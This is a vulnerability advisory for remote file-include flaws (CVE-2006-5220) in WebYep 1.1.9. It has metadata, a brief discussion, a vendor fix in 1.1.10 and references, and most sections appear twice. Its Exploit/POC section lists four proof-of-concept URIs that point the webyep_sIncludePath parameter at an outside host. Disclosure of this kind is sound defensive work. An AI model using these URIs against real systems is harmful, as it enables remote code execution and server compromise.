WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities
BID:20406
Info
WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 20406 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-5220 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 09 2006 12:00AM |
| Updated: | Sep 26 2007 07:49PM |
| Credit: | Dedi Dwianto is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Objective Development WebYep 1.1.9 |
| Not Vulnerable: |
Objective Development WebYep 1.1.10 |
Discussion
WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities
WebYep is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
WebYep 1.1.9 and prior versions are affected by these issues.
WebYep is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
WebYep 1.1.9 and prior versions are affected by these issues.
Exploit / POC
WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[webYep_path]/webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.example.com?
http://www.example.com/[webYep_path]/webyep-system/programm/lib/WYDocument.php?webyep_sIncludePath=http://www.example.com?
http://www.example.com/[webYep_path]/webyep-system/programm/webyep.php?webyep_sIncludePath=http://www.example.com?
http://www.example.com/[webYep_path]/webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=http://www.example.com?
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[webYep_path]/webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.example.com?
http://www.example.com/[webYep_path]/webyep-system/programm/lib/WYDocument.php?webyep_sIncludePath=http://www.example.com?
http://www.example.com/[webYep_path]/webyep-system/programm/webyep.php?webyep_sIncludePath=http://www.example.com?
http://www.example.com/[webYep_path]/webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=http://www.example.com?
Solution / Fix
WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities
Solution:
This issue has been address by the vendor in WebYep 1.1.10 and later. Please see the references for more information.
Objective Development WebYep 1.1.9
Solution:
This issue has been address by the vendor in WebYep 1.1.10 and later. Please see the references for more information.
Objective Development WebYep 1.1.9
-
Objective Development WebYep_Plain_1.2_en.zip
http://www.obdev.at/ftp/pub/Products/WebYep/english/WebYep_Plain_1.2_e n.zip
References
WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- WebYep Home Page (Objective Development)
- WebYep Release Notes (Objective Development)
- [ECHO_ADV_48$2006] WebYep <= 1.1.9 (webyep_sIncludePath) Multiple Remote File In ([email protected])
- WebYep-1.1.9 - Remote File Include Vulnerabilities ([email protected])